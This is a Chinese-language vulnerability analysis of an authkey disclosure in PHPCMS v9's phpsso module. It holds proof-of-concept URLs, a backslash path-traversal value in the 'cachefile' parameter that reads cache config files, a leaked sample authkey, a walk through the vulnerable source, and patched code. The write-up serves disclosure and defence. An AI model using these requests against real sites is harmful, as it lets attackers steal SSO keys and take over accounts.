catalog
1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響範圍 4. 漏洞程式碼分析 5. 防禦方法 6. 攻防思考
1. 漏洞描述
安裝phpcms的時候會強制安裝它的通行證
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2014-066394
2. 漏洞觸發條件
0x1: POC1
1. 訪問頭像上傳頁面 http://localhost/phpcms_v9/index.php?m=member&c=index&a=account_manage_avatar&t=1 //獲取'upurl':"aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ==&callback=return_avatar&" 2. Base64解碼後 http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA //將url裡的uploadavatar換成:getapplist http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA 3. 得到authkey
0x2: POC Bypass Path 1
http://localhost/phpcms_v9/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
3. 漏洞影響範圍
4. 漏洞程式碼分析
\phpsso_server\phpcms\modules\phpsso\index.php
/** * 獲取應用列表 */ public function getapplist() { $applist = getcache('applist', 'admin'); exit(serialize($applist)); }
這個函式從cache中獲取applist資訊,繼續追溯cache裡的內容
\phpsso_server\caches\caches_admin\caches_data\applist.cache.php
<?php return array ( 1 => array ( 'appid' => '1', 'type' => 'phpcms_v9', 'name' => 'phpcms v9', 'url' => 'http://localhost/phpcms_v9/', 'authkey' => 'lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0', 'ip' => '', 'apifilename' => 'api.php?op=phpsso', 'charset' => 'utf-8', 'synlogin' => '1', ), ); ?>
所以只要我們呼叫phpsso並且能走到getapplist()這個方法裡,就會突出sso配置的客戶端的所有資訊,包括authkey,我們繼續回溯分析漏洞源頭
\phpsso_server\phpcms\modules\phpsso\classes\phpsso.class.php
public function __construct() { $this->db = pc_base::load_model('member_model'); pc_base::load_app_func('global'); /*獲取系統配置*/ $this->settings = getcache('settings', 'admin'); $this->applist = getcache('applist', 'admin'); //GET資料全部傳遞給POST if(isset($_GET) && is_array($_GET) && count($_GET) > 0) { foreach($_GET as $k=>$v) { if(!in_array($k, array('m','c','a'))) { $_POST[$k] = $v; } } } if(isset($_POST['appid'])) { $this->appid = intval($_POST['appid']); } else { exit('0'); } if(isset($_POST['data'])) { //將getapplist()結果賦值給$_POST['data'] parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data); if(empty($this->data) || !is_array($this->data)) { exit('0'); } } else { exit('0'); }
接下里的問題是我們要如何獲取$_POST['data'],繼續回溯到上傳頭像頁面
http://localhost/phpcms_v9/index.php?m=member&c=index&a=account_manage_avatar&t=1 //檢視原始碼 script type="text/javascript"> var flashvars = { 'upurl':"aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ==&callback=return_avatar&" }; var params = { 'align':'middle', 'play':'true', 'loop':'false', 'scale':'showall', 'wmode':'window', 'devicefont':'true', 'id':'Main', 'bgcolor':'#ffffff', 'name':'Main', 'allowscriptaccess':'always' }; var attributes = {
得到base64編碼後的URL
aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ== /* http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA */
將url裡的uploadavatar換成:getapplist
http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA
得到結果
a:1:{i:1;a:9:{s:5:"appid";s:1:"1";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:9:"phpcms v9";s:3:"url";s:27:"http://localhost/phpcms_v9/";s:7:"authkey";s:32:"lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:5:"utf-8";s:8:"synlogin";s:1:"1";}} /* authkey: lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0 */
得到這個authkey,就可以獲得了sso體系中的令牌,廠商對index.php中的getapplist()函式進行了patch,unset了陣列中的authkey鍵值,但是卻沒有充分考慮到全部的攻擊面
\api\get_menu.php
/** * 獲取地區列表 */ function ajax_getlist() { $cachefile = $_GET['cachefile']; $cachefile = str_replace(array('/', '//'), '', $cachefile); //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile); $path = $_GET['path']; $path = str_replace(array('/', '//'), '', $path); //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path); $title = $_GET['title']; $key = $_GET['key']; //getcache的兩個參量是可控的。並且沒有過濾反斜槓。構造合適的訪問連結可以訪問到cache資料夾中的配置檔案,並讀取內容 $infos = getcache($cachefile,$path); $where_id = intval($_GET['parentid']); $parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]); foreach($infos AS $k=>$v) { if($v['parentid'] == $where_id) { if ($v['parentid']) $parentid = $infos[$v['parentid']]['parentid']; $s[]=iconv(CHARSET,'utf-8',$v['catid'].','.trim($v[$key]).','.$v['parentid'].','.$parent_menu_name.','.$parentid); } } if(count($s)>0) { $jsonstr = json_encode($s); echo trim_script($_GET['callback']).'(',$jsonstr,')'; exit; } else { echo trim_script($_GET['callback']).'()';exit; } }
Relevant Link:
http://0cx.cc/phpcms_phpsso_auth_key.jspx http://0day5.com/archives/3251
5. 防禦方法
\phpsso_server\phpcms\modules\phpsso\index.php
/** * 獲取應用列表 */ public function getapplist() { $applist = getcache('applist', 'admin'); /**/ foreach($applist as $key=>$value) { unset($applist[$key]['authkey']); } /**/ exit(serialize($applist)); }
\api\get_menu.php
/** * 獲取地區列表 */ function ajax_getlist() { $cachefile = $_GET['cachefile']; //$cachefile = str_replace(array('/', '//'), '', $cachefile); /**/ $cachefile = str_replace(array('/', '//', '\\'), '', $cachefile); /**/ //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile); $path = $_GET['path']; $path = str_replace(array('/', '//'), '', $path); //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path); $title = $_GET['title']; $key = $_GET['key']; //getcache的兩個參量是可控的。並且沒有過濾反斜槓。構造合適的訪問連結可以訪問到cache資料夾中的配置檔案,並讀取內容 $infos = getcache($cachefile,$path); $where_id = intval($_GET['parentid']); $parent_menu_name = ($where_id==0) ? '' : trim($infos[$where_id][$key]); foreach($infos AS $k=>$v) { if($v['parentid'] == $where_id) { if ($v['parentid']) $parentid = $infos[$v['parentid']]['parentid']; $s[]=iconv(CHARSET,'utf-8',$v['catid'].','.trim($v[$key]).','.$v['parentid'].','.$parent_menu_name.','.$parentid); } } if(count($s)>0) { $jsonstr = json_encode($s); echo trim_script($_GET['callback']).'(',$jsonstr,')'; exit; } else { echo trim_script($_GET['callback']).'()';exit; } }
Relevant Link:
http://0day5.com/archives/3202 http://www.wooyun.org/bugs/wooyun-2015-0105242
6. 攻防思考
Copyright (c) 2015 Little5ann All rights reserved